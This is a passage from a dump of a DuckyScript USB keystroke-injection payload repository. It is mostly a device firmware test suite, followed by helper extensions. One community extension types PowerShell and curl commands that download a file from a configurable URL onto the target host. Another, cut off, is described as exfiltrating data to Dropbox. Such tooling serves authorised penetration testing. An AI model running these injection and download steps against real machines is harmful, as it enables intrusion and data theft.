THEN\n\t\t\t\t$d1 = ($INPUT % 16)\n\t\t\tELSE IF ($chars == 1) THEN\n\t\t\t\t$d2 = ($INPUT % 16)\n\t\t\tELSE IF ($chars == 2) THEN\n\t\t\t\t$d3 = ($INPUT % 16)\n\t\t\tELSE IF ($chars == 3) THEN\n\t\t\t\t$d4 = ($INPUT % 16)\n\t\t\tEND_IF\n\t\t\t$chars = ($chars + 1)\n\t\t\t$INPUT = ($INPUT / 16)\n\t\tEND_WHILE\n\t\tVAR $i = 0\n\t\tSTRING 0x\n\t\tIF ($chars == 0) THEN\n\t\t\tSTRING 0x0000\n\t\tELSE IF ($chars == 1) THEN\n\t\t\tSTRING 000\n\t\t\t$D = $d1\n\t\t\tPRINTDIGIT()\n\t\tELSE IF ($chars == 2) THEN\n\t\t\tSTRING 00\n\t\t\t$D = $d2\n\t\t\tPRINTDIGIT()\n\t\t\t$D = $d1\n\t\t\tPRINTDIGIT()\n\t\tELSE IF ($chars == 3) THEN\n\t\t\tSTRING 0\n\t\t\t$D = $d3\n\t\t\tPRINTDIGIT()\n\t\t\t$D = $d2\n\t\t\tPRINTDIGIT()\n\t\t\t$D = $d1\n\t\t\tPRINTDIGIT()\n\t\tELSE IF ($chars == 4) THEN\n\t\t\tSTRING 0\n\t\t\t$D = $d4\n\t\t\tPRINTDIGIT()\n\t\t\t$D = $d3\n\t\t\tPRINTDIGIT()\n\t\t\t$D = $d2\n\t\t\tPRINTDIGIT()\n\t\t\t$D = $d1\n\t\t\tPRINTDIGIT()\n\t\tEND_IF\n\t\tIF $NL THEN\n\t\t\tENTER\n\t\tEND_IF\n\tEND_FUNCTION\nEND_EXTENSION\n\nFUNCTION countdown()\n\tWHILE ( $CD > 0 )\n\t\tSTRING .\n\t\t$CD = ($CD - 1)\n\t\tDELAY 1000\n\tEND_WHILE\nEND_FUNCTION\n\nDELAY 1000\nENTER\nSTRINGLN ~TEST SUITE~\nSTRINGLN press button NOW to stop & enter storage\nDELAY 1000\n\nENTER\nSTRINGLN _LED_\n\nSTRING OFF :\nLED_OFF\nDELAY 500\nPASSED()\n\nSTRING R :\nLED_R\nDELAY 500\nPASSED()\n\nSTRING G :\nLED_G\nDELAY 500\nPASSED()\n\n\nFUNCTION injection_test()\nENTER\nSTRINGLN abcdefghijklmnopqrstuvxyz0123456789\nSTRINGLN ABCDEFGHIJKLMNOPQRSTUVXYZ0123456789\nSTRINGLN aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVxXyYzZ0123456789\nSTRINGLN _________ \nSTRINGLN /__TEST__/\\\nSTRINGLN \\__.::.__\\/\nSTRINGLN \\::\\ \\ \nSTRINGLN \\::\\ \\ \nSTRINGLN \\::\\ \\ \nSTRINGLN \\__\\/\nEND_FUNCTION\n\n\nENTER\nSTRINGLN _Injection_\ninjection_test()\nSTRING Basic injection :\nPASSED()\n\nSTRING (DEFAULT)HID->OFF->HID STORAGE :\nDELAY 500\nATTACKMODE OFF\nLED_OFF\nDELAY 500\nLED_R\nDELAY 500\nLED_OFF\nATTACKMODE HID STORAGE VID_05AC PID_021E MAN_TEST PROD_TEST SERIAL_133713371337\nDELAY 500\nPASSED()\n\nENTER\nSTRINGLN _UNIT TESTS_\nREM ------------------------------------------------------------------------------------------------------------------------------\n\nSTRING TRUE :\nIF TRUE THEN \n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING FALSE :\nIF FALSE THEN \n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\nSTRING (TRUE) :\nIF ( TRUE ) THEN \n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (FALSE) :\nIF ( FALSE ) THEN \n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING TRUE==TRUE :\nIF ( TRUE == TRUE ) THEN\n\tPASSED()\nELSE \n\tFAIL()\nEND_IF\n\nSTRING FALSE==FALSE :\nIF ( FALSE == FALSE ) THEN\n\tPASSED()\nELSE \n\tFAIL()\nEND_IF\n\nSTRING TRUE==FALSE :\nIF ( TRUE == FALSE ) THEN\n\tFAIL()\nELSE \n\tPASSED()\nEND_IF\n\nSTRING TRUE!=FALSE :\nIF ( TRUE != FALSE ) THEN\n\tPASSED()\nELSE \n\tFAIL()\nEND_IF\n\nSTRING 1==1 :\nIF ( 1 == 1 ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING 0==0 :\nIF ( 0 == 0 ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((1+1)==2) :\nIF ((1+1) == 2) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((2-1)==(0+1)) :\nIF ((2-1) == (0+1)) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((2*2)==4) :\nIF ((2*2) == 4) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((4/2)==2) :\nIF ((4/2) == 2) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((4/2)==2) :\nIF ((4/2) == 2) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (10>0) :\nIF (10 > 0) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (10<100) :\nIF (10 < 100) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (10<=11) :\nIF (10 <= 11) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (10<=10) :\nIF (10 <= 10) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (11>=10) :\nIF (11 >= 10) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (10>=10) :\nIF (10 >= 10) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (TRUE&&TRUE) :\nIF (TRUE && TRUE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (FALSE&&TRUE) :\nIF (FALSE && TRUE) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING (TRUE||TRUE) :\nIF (TRUE || TRUE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (FALSE||TRUE) :\nIF (FALSE || TRUE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((10%2)==0) :\nIF ((10 % 2) == 0) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ((11%2)==1) :\nIF ((11 % 2) == 1) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING $zero=0;($zero ==0) :\nVAR $zero = 0\nIF ( $zero == 0 ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ($zero==1) :\nIF ( $zero == 1 ) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING $one=1;($one==1) :\nVAR $one = 1\nIF ( $one == 1 ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ($one!=1) :\nIF ( $one != 1 ) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING ($one+1);($two==2) :\nVAR $two = ( $one + 1 )\nIF ( $two == 2 ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ($two!=2) :\nIF ( $two != 2 ) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING ($two==$two) :\nIF ( $two == $two ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ($two!=$two) :\nIF ( $two != $two ) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING (($two==$one)||($two==$zero)) :\nIF ( ($two == $one) || ($two == $zero) ) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nSTRING ((($one+1)==$two)&&((($zero+$two)+1)==3)) :\nIF ( (($one + 1) == $two) && ((($zero + $two) + 1) == 3) ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nENTER\nSTRINGLN _FUNCTIONS_ \nREM ------------------------------------------------------------------------------------------------------------------------------\n\nFUNCTION f_one()\n\tRETURN 1\nEND_FUNCTION\n\nFUNCTION f_v_one()\n\tRETURN $one\nEND_FUNCTION\n\nFUNCTION f_zero()\n\tRETURN 0\nEND_FUNCTION\n\nFUNCTION early_ret()\n\tIF ( 0 == 0 ) THEN\n\t\tRETURN TRUE\n\tELSE\n\t\tRETURN FALSE\n\tEND_IF\nEND_FUNCTION\n\nSTRING (early_ret()==TRUE) :\nIF (early_ret() == TRUE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (f_one()==1) :\nIF (f_one() == 1) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING (f_zero()==0) :\nIF (f_zero() == 0) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING $retVal=f_one();($retVal==1) :\nVAR $retVal = f_one()\nIF ($retVal == 1) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING $retVal=f_v_one();($retVal==1) :\n$retVal = f_v_one()\nIF ($retVal == 1) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nENTER\nSTRING _BUTTON_\nREM ------------------------------------------------------------------------------------------------------------------------------\n\nFUNCTION print_button_states()\n\tENTER\n\tSTRING Button push received :\n\t$INPUT = $_BUTTON_PUSH_RECEIVED\n\tTRANSLATE_BOOL()\n\tSTRING Button Enabled :\n\t$INPUT = $_BUTTON_ENABLED\n\tTRANSLATE_BOOL()\n\tSTRING Button user defined :\n\t$INPUT = $_BUTTON_USER_DEFINED\n\tTRANSLATE_BOOL()\n\tSTRING Button timeout :\n\t$INPUT = $_BUTTON_TIMEOUT\n\tTRANSLATE_INT()\nEND_FUNCTION\n\nFUNCTION request_button_press()\n\tSTRING PRESS DUCK BUTTON :\n\tWAIT_FOR_BUTTON_PRESS\n\tPASSED()\nEND_FUNCTION\n\nprint_button_states()\n\nrequest_button_press()\nrequest_button_press()\n\nREM print_button_states()\nSTRINGLN $_BUTTON_ENABLED = FALSE;\n$_BUTTON_ENABLED = FALSE\nREM print_button_states()\nSTRING ($_BUTTON_ENABLED==TRUE) :\nIF ($_BUTTON_ENABLED == TRUE) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\nSTRING PRESS DUCK BUTTON (expect no result) within 3s\n$CD = 3\ncountdown()\nPASSED()\nREM print_button_states()\nSTRINGLN $_BUTTON_ENABLED = TRUE;\n$_BUTTON_ENABLED = TRUE\nREM print_button_states()\nSTRING ($_BUTTON_ENABLED==FALSE) :\nIF ($_BUTTON_ENABLED == FALSE) THEN\n\tFAIL()\nELSE\n\tPASSED()\nEND_IF\n\nrequest_button_press()\n\nBUTTON_DEF\n\tPASSED()\n\tSTRINGLN PRESSED ONCE\n\tBUTTON_DEF\n\t\tPASSED()\n\t\tSTRINGLN PRESSED TWICE\n\tEND_BUTTON\nEND_BUTTON\n\nDELAY 1000\nSTRING MASH BUTTON within 5s\n$CD = 5\ncountdown()\nENTER\n\nSTRINGLN Manual button check\n$_BUTTON_ENABLED = FALSE\n$_BUTTON_PUSH_RECEIVED = FALSE\nREM print_button_states()\nSTRING PUSH BUTTON N times within 5s\n$CD = 15 \nWHILE ($CD > 0)\n\tIF ($_BUTTON_PUSH_RECEIVED == TRUE) THEN\n\t\tSTRINGLN p\n\t\t$_BUTTON_PUSH_RECEIVED = FALSE\n\tEND_IF\n\t$CD = ($CD - 1)\n\tSTRING .\n\tDELAY 200 \nEND_WHILE\n$_BUTTON_ENABLED = TRUE\n$_BUTTON_PUSH_RECEIVED = FALSE\n\nENTER\nSTRINGLN _LOCKS_\nREM ------------------------------------------------------------------------------------------------------------------------------\n\nSTRING Saving lock state :\nSAVE_HOST_KEYBOARD_LOCK_STATE\nPASSED()\n\nFUNCTION compare_saved_lock_states()\n\tSTRING ($_SAVED_CAPSLOCK_ON==$_CAPSLOCK_ON) :\n\tIF ($_SAVED_CAPSLOCK_ON == $_CAPSLOCK_ON) THEN\n\t\tPASSED()\n\tELSE\n\t\tFAIL()\n\tEND_IF\n\n\tSTRING ($_SAVED_NUMLOCK_ON==$_NUMLOCK_ON) :\n\tIF ($_SAVED_NUMLOCK_ON == $_NUMLOCK_ON) THEN\n\t\tPASSED()\n\tELSE\n\t\tFAIL()\n\tEND_IF\n\n\tSTRING ($_SAVED_SCROLLLOCK_ON==$_SCROLLLOCK_ON) :\n\tIF ($_SAVED_SCROLLLOCK_ON == $_SCROLLLOCK_ON) THEN\n\t\tPASSED()\n\tELSE\n\t\tFAIL()\n\tEND_IF\nEND_FUNCTION\n\ncompare_saved_lock_states()\n\nSTRING ($_CAPSLOCK_ON==TRUE) THEN; CAPSLOCK;\nIF ( $_CAPSLOCK_ON == TRUE ) THEN\n\tCAPSLOCK\n\tDELAY 100\nEND_IF\n\nSTRING ( $_CAPSLOCK_ON == FALSE ) :\nIF ( $_CAPSLOCK_ON == FALSE ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING ( $_NUMLOCK_ON == FALSE ) THEN; NUMLOCK;\nIF ( $_NUMLOCK_ON == FALSE ) THEN\n\tNUMLOCK\n\tDELAY 100\nEND_IF\n\nSTRING ( $_NUMLOCK_ON == TRUE ) :\nIF ( $_NUMLOCK_ON == TRUE ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nFUNCTION wait_for_caps_on() \n\tSTRING press capslock(wait for caps on):\n\tWAIT_FOR_CAPS_ON\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_caps_off()\n\tSTRING press capslock(wait for caps off):\n\tWAIT_FOR_CAPS_OFF\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_caps_change()\n\tSTRING press capslock(wait for caps change):\n\tWAIT_FOR_CAPS_CHANGE\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_num_off()\n\tSTRING press numlock(wait for num off):\n\tWAIT_FOR_NUM_OFF\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_num_on()\n\tSTRING press numlock(wait for num on):\n\tWAIT_FOR_NUM_ON\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_num_change()\n\tSTRING press numlock(wait for num change):\n\tWAIT_FOR_NUM_CHANGE\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_scroll_off()\n\tSTRING press scroll lock(wait for scroll off):\n\tWAIT_FOR_SCROLL_OFF\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_scroll_on()\n\tSTRING press scroll lock(wait for scroll on):\n\tWAIT_FOR_SCROLL_ON\n\tPASSED()\nEND_FUNCTION\nFUNCTION wait_for_scroll_change()\n\tSTRING press scroll lock(wait for scroll change):\n\tWAIT_FOR_SCROLL_CHANGE\n\tPASSED()\nEND_FUNCTION\n\nIF ($_CAPSLOCK_ON == TRUE) THEN\n\twait_for_caps_off()\n\twait_for_caps_on()\nELSE\n\twait_for_caps_on()\n\twait_for_caps_off()\nEND_IF\n\nwait_for_caps_change()\nwait_for_caps_change()\n\nIF ($_NUMLOCK_ON == TRUE) THEN\n\twait_for_num_off()\n\twait_for_num_on()\nELSE\n\twait_for_num_on()\n\twait_for_num_off()\nEND_IF\n\nwait_for_num_change()\nwait_for_num_change()\n\nIF($_SCROLLLOCK_ON == TRUE) THEN\n\twait_for_scroll_off()\n\twait_for_scroll_on()\nELSE\n\twait_for_scroll_on()\n\twait_for_scroll_off()\nEND_IF\n\nwait_for_scroll_change()\nwait_for_scroll_change()\n\nSTRING Restoring lock state :\nRESTORE_HOST_KEYBOARD_LOCK_STATE\nPASSED()\n\ncompare_saved_lock_states()\n\n\nREM ------------------------------------------------------------------------------------------------------------------------------\n\nSTRING Storage activity timeout :\n$INPUT = $_STORAGE_ACTIVITY_TIMEOUT\nTRANSLATE_INT()\n\nREM this is 0 because its already timed out\nSTRING ($_STORAGE_ACTIVITY_TIMEOUT==0) :\nIF ( $_STORAGE_ACTIVITY_TIMEOUT == 0 ) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING Payload Parse Speed :\n$INPUT = $_PAYLOAD_PARSE_SPEED\nTRANSLATE_INT()\n\nSTRING ($_PAYLOAD_PARSE_SPEED==2) :\nIF ($_PAYLOAD_PARSE_SPEED == 2) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING System LEDs enabled :\n$INPUT = $_SYSTEM_LEDS_ENABLED\nTRANSLATE_BOOL()\n\nSTRING Storage LEDs enabled :\n$INPUT = $_STORAGE_LEDS_ENABLED\nTRANSLATE_BOOL()\n\nSTRING Injecting LEDs enabled :\n$INPUT = $_INJECTING_LEDS_ENABLED\nTRANSLATE_BOOL()\n\nSTRING Exfil LEDs enabled :\n$INPUT = $_EXFIL_LEDS_ENABLED\nTRANSLATE_BOOL()\n\nSTRING Received host lock LED reply :\n$INPUT = $_RECEIVED_HOST_LOCK_LED_REPLY\nTRANSLATE_BOOL()\n\nSTRING EXFIL mode enabled :\n$INPUT = $_EXFIL_MODE_ENABLED\nTRANSLATE_BOOL()\n\nSTRING ($_EXFIL_MODE_ENABLED==FALSE) :\nIF ( $_EXFIL_MODE_ENABLED == FALSE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING OS(default):\n$INPUT = $_OS\nTRANSLATE_INT()\n\nSTRING Driver counter :\n$INPUT = $_HOST_CONFIGURATION_REQUEST_COUNT\nTRANSLATE_INT()\n\nSTRING Storage active :\n$INPUT = $_STORAGE_ACTIVE\nTRANSLATE_BOOL()\n\nENTER\nSTRINGLN _JITTER_\nREM ------------------------------------------------------------------------------------------------------------------------------\n\nSTRING Jitter enabled :\n$INPUT = $_JITTER_ENABLED\nTRANSLATE_BOOL()\n\nSTRING ($_JITTER_ENABLED==FALSE) :\nIF ($_JITTER_ENABLED == FALSE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING Jitter max :\n$INPUT = $_JITTER_MAX\nTRANSLATE_INT()\n\nSTRINGLN $_JITTER_ENABLED=TRUE;\n$_JITTER_ENABLED = TRUE\nSTRING ($_JITTER_ENABLED == TRUE) :\nIF ($_JITTER_ENABLED == TRUE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\ninjection_test()\n$_JITTER_ENABLED = FALSE\nSTRING TEST W/FW JITTER ON :\nPASSED()\n\nENTER\nSTRINGLN _HOLD_\nREM ------------------------------------------------------------------------------------------------------------------------------\n\nSTRINGLN HOLD a;DELAY 1500;RELEASE a :\nHOLD a\nDELAY 1000\nRELEASE a\nENTER\nPASSED()\n\nSTRINGLN HOLD A;DELAY 1500;RELEASE A :\nHOLD A\nDELAY 1000\nRELEASE A\nPASSED()\n\nSTRINGLN MANUAL INJECTMOD, HOLD MOD, KEY_DOWN, RELEASE a, RESET test :\nINJECT_MOD\nHOLD SHIFT\nKEY_DOWN 0400\nDELAY 1000\nRELEASE a\nRESET\n\nSTRING MANUAL inject A :\nINJECT 0402 \nSTRING :\nPASSED()\n\nSTRING MANUAL state type A :\nMOD_DOWN 0402\nMOD_KEY_DOWN 0402\nMOD_KEY_UP 0402\nMOD_UP 0402\nSTRING :\nPASSED()\n\nSTRING MANUAL type a :\nKEY_DOWN 0402\nKEY_UP 0402\nSTRING :\nPASSED()\n\nSTRING DELAY $ :\nVAR $T = 1000\nSTRING $T(1000) :\nDELAY $T\nPASSED()\nSTRINGLN $T = ($T * 2);\n$T = ($T * 2)\nSTRING DELAY $T :\nDELAY $T\nPASSED()\n\nREM EXTENDED DELAY\nREM DELAY 65536\n\n\nSTRINGLN _EXFIL VAR_\nREM ------------------------------------------------------------------------------------------------------------------------------\nSTRING EXFIL $T : \n$T = 1000\nEXFIL $T\nPASSED()\n\nSTRING _RAND_\nREM ------------------------------------------------------------------------------------------------------------------------------\nENTER\n\nSTRING Rand min :\n$INPUT = $_RANDOM_MIN\nTRANSLATE_INT()\n\nSTRING ($_RANDOM_MIN==0) :\nIF ($_RANDOM_MIN == 0) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING Rand max :\n$INPUT = $_RANDOM_MAX\nTRANSLATE_INT()\n\nSTRING ($_RANDOM_MAX==9) :\nIF ($_RANDOM_MAX == 9) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING $_RANDOM_INT :\n$INPUT = $_RANDOM_INT\nTRANSLATE_INT()\n\nSTRING 0<$_RANDOM_INT>9 bounds :\nIF (($_RANDOM_INT >= 0) && ($_RANDOM_INT <= 9)) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING min<$_RANDOM_INT>max bounds :\nIF (($_RANDOM_INT >= $_RANDOM_MIN) && ($_RANDOM_INT <= $_RANDOM_MAX)) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nSTRING Random seed :\n$INPUT = $_RANDOM_SEED\nTRANSLATE_INT()\n\nVAR $length = 100\nFUNCTION generate_random_lower()\n\t$length = 100\n\tWHILE ( $length > 0 ) \n\t\tRANDOM_LOWERCASE_LETTER\n\t\t$length = ($length - 1)\n\tEND_WHILE\n\tENTER\nEND_FUNCTION\n\nFUNCTION generate_random_upper()\n\t$length = 100\n\tWHILE ( $length > 0 ) \n\t\tRANDOM_UPPERCASE_LETTER\n\t\t$length = ($length - 1)\n\tEND_WHILE\n\tENTER\nEND_FUNCTION\n\nFUNCTION generate_random_letter()\n\t$length = 100\n\tWHILE ( $length > 0 ) \n\t\tRANDOM_LETTER\n\t\t$length = ($length - 1)\n\tEND_WHILE\n\tENTER\nEND_FUNCTION\n\nFUNCTION generate_random_number()\n\t$length = 100\n\tWHILE ( $length > 0 ) \n\t\tRANDOM_NUMBER\n\t\t$length = ($length - 1)\n\tEND_WHILE\n\tENTER\nEND_FUNCTION\n\nFUNCTION generate_random_special()\n\t$length = 100\n\tWHILE ( $length > 0 ) \n\t\tRANDOM_SPECIAL\n\t\t$length = ($length - 1)\n\tEND_WHILE\n\tENTER\nEND_FUNCTION\n\nFUNCTION generate_random_char()\n\t$length = 100\n\tWHILE ( $length > 0 ) \n\t\tRANDOM_CHAR\n\t\t$length = ($length - 1)\n\tEND_WHILE\n\tENTER\nEND_FUNCTION\n\nSTRINGLN RAND LOWER:\ngenerate_random_lower()\nSTRINGLN RAND UPPER:\ngenerate_random_upper()\nSTRINGLN RAND LETTER:\ngenerate_random_letter()\nSTRINGLN RAND NUMBER:\ngenerate_random_number()\nSTRINGLN RAND SPECIAL:\ngenerate_random_special()\nSTRINGLN RAND CHAR:\ngenerate_random_char()\n\nREM ------------------------------------------------------------------------------------------------------------------------------\nFUNCTION vid_pid_check()\n\t$INPUT = $_CURRENT_VID\n\tSWAP_ENDIAN()\n\tSTRING ($INPUT(vid)==0x05AC) :\n\tIF ($INPUT == 0x05AC) THEN\n\t\tPASSED()\n\tELSE\n\t\tFAIL()\n\tEND_IF\n\tSTRING $_CURRENT_VID(hex):\n\tTRANSLATE_HEX()\n\t$INPUT = $_CURRENT_PID\n\tSWAP_ENDIAN()\n\tSTRING ($INPUT(pid)==0x021E) :\n\tIF ($INPUT == 0x021E) THEN\n\t\tPASSED()\n\tELSE\n\t\tFAIL()\n\tEND_IF\n\tSTRING $_CURRENT_PID(hex):\n\tTRANSLATE_HEX()\nEND_FUNCTION\n\nvid_pid_check()\n\nSTRINGLN SAVE_ATTACKMODE;ATTACKMODE OFF;RESTORE_ATTACKMODE;\nSAVE_ATTACKMODE\nDELAY 500\nATTACKMODE OFF\nDELAY 500\nLED_OFF\nDELAY 50\nLED_R\nDELAY 50\nLED_G\nDELAY 50\nLED_R\nDELAY 50\nLED_OFF\nRESTORE_ATTACKMODE\nPASSED()\nDELAY 500\n\nvid_pid_check()\n\nSTRING ($_CURRENT_ATTACKMODE==3) :\nIF ($_CURRENT_ATTACKMODE == 3) THEN\n\tPASSED()\nELSE\n\tFAILED\nEND_IF\n\nSTRING ATTACKMODE HID STORAGE MAN_T PROD_T SERIAL_RANDOM :\nATTACKMODE HID STORAGE MAN_T PROD_T SERIAL_RANDOM\nDELAY 500\nPASSED()\n\nSTRINGLN Setting BUTTON to toggle hide/restore\nBUTTON_DEF\n\tIF (($TOGGLE % 2) == 0) THEN\n\t\tATTACKMODE OFF\n\t\tHIDE_PAYLOAD\n\t\tDELAY 500\n\t\tATTACKMODE STORAGE\n\tELSE\n\t\tATTACKMODE OFF\n\t\tRESTORE_PAYLOAD\n\t\tDELAY 500\n\t\tATTACKMODE STORAGE\n\tEND_IF\n\t$TOGGLE = ($TOGGLE + 1)\nEND_BUTTON\n\nSTRING ($_BUTTON_USER_DEFINED==TRUE) :\nIF ($_BUTTON_USER_DEFINED == TRUE) THEN\n\tPASSED()\nELSE\n\tFAIL()\nEND_IF\n\nENTER\nSTRINGLN ~DONE~\nSTRING F:\n$INPUT = $FAILED\nTRANSLATE_INT()\nSTRING P:\n$INPUT = $PASS\nTRANSLATE_INT()\nIF ( $FAILED == 0 ) THEN\n\tSTRINGLN TESTS PASSED\n\tLED_G\nELSE \n\tSTRINGLN TESTS FAILED\n\tLED_R\nEND_IF\nENTER\nSTRINGLN DONE\n" }, { "path": "payloads/examples/Variables/VAR-example1.txt", "content": "REM In DuckyScript, variables are initiated using the VAR command.\r\rREM Example Integer Variable\rVAR $SPEED = 2000\r\rREM Example Boolean (TRUE/FALSE or 1/0)\rVAR $BLINK = TRUE\rVAR $BLINK = 1\r\rREM Unlike a constant (declared by DEFINE), a variable is appended with the dollar sign (\"$\") sigil.\r\rREM Constant string which may not change\rREM throughout the payload\rDEFINE FOO Hello, World!\r\rREM Variable integer which may change \rREM throughout the payload\rVAR $BAR = 1337\r\rREM The constant FOO will always be replaced with the string \"Hello, World!\" throughout the payload.\rREM While the variable $BAR currently holds the value 1337, this may change throughout the payload — which will be detailed shortly by using operators." }, { "path": "payloads/extensions/button_deploy.txt", "content": "EXTENSION BUTTON_DEPLOY\n REM VERSION 1.0\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Use this during development to invert the default behavior of the ducky.\n With this extension the ducky will now be storage by default - pressing the button\n will start the payload - all subsequent button presses will be default unless\n redefined by a BUTTON_DEF\n\n TARGET:\n Any\n \n USAGE:\n Place at the top of your payload\n\n DEPLOYMENT:\n Insert into target host, it will appear as storage, press the button to leave storage and start the payload\n\n IMPORTANT NOTE:\n Pressing the button will not reload the inject.bin;\n the duck will still need to be power cycled (removed/reinserted)\n to test a NEW inject.bin. This is simply a helper/method to \n avoid accidentally running a payload on your development machine\n END_REM\n\n ATTACKMODE STORAGE\n WAIT_FOR_BUTTON_PRESS\n ATTACKMODE HID\nEND_EXTENSION" }, { "path": "payloads/extensions/community/DETECT_FINISHED", "content": "EXTENSION DETECT_FINISHED\n REM VERSION 1.0\n REM AUTHOR: 0i41E\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Use the function Detect_Finished() to signal the finished execution of your payload.\n END_REM\n\n REM CONFIGURATION:\n DEFINE #PAUSE 150\n FUNCTION Detect_Finished()\n IF ($_CAPSLOCK_ON == FALSE)\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n ATTACKMODE OFF\n ELSE IF\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n ATTACKMODE OFF\n END_IF\n END_FUNCTION\nEND_EXTENSION\n" }, { "path": "payloads/extensions/community/POWERSHELL_DOWNLOAD", "content": "EXTENSION POWERSHELL_DOWNLOAD\n REM VERSION 1.0\n REM Author: 0i41E\n REM Downloads the desired file via powershell\n REM Use the method you want to use, via the specific function, define the URL and the output.\n\n REM CONFIGURATION:\n REM Delay before executing the download\n DEFINE #INPUT_WAIT 2000\n REM URL of the file which gets downloaded\n DEFINE #URL https://example.com/\n REM Output name of your downloaded file\n DEFINE #OUTPUT default\n \n REM Use Invoke-WebRequest to download a file onto the system\n FUNCTION Invoke_WebRequest()\n DELAY #INPUT_WAIT \n STRINGLN Invoke-WebRequest -Uri '#URL' -UseBasicParsing -OutFile #OUTPUT\n END_FUNCTION\n\n REM Use Invoke-RestMethod to download a file onto the system\n FUNCTION Invoke_RestMethod()\n DELAY #INPUT_WAIT \n STRINGLN Invoke-RestMethod -Uri '#URL' -UseBasicParsing -OutFile #OUTPUT\n END_FUNCTION\n\n REM Use Start_BitsTransfer to download a file onto the system\n FUNCTION Start_BitsTransfer()\n DELAY #INPUT_WAIT \n STRINGLN Start-BitsTransfer -Source '#URL' -Destination #OUTPUT\n END_FUNCTION\n\n REM Use Curl.exe to download a file onto the system\n FUNCTION Curl_exe()\n DELAY #INPUT_WAIT \n STRINGLN curl.exe -L '#URL' -o #OUTPUT\n END_FUNCTION\n\n REM EXAMPLE USAGE AFTER EXTENSION\n REM Use the function fitting your usecase, Start_BitsTransfer() is used as example here\n REM DELAY 2000\n REM GUI r\n REM DELAY 2000\n REM STRINGLN powershell\n REM DELAY 500\n REM Start_BitsTransfer()\n\nEND_EXTENSION\n\n\n" }, { "path": "payloads/extensions/community/POWERSHELL_TO_DROPBOX", "content": "EXTENSION POWERSHELL_TO_DROPBOX\n REM_BLOCK DOCUMENTATION\n Title: PowerShell To Dropbox\n Author: PlumpyTurkey\n Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.\n Target: Windows 10, 11\n 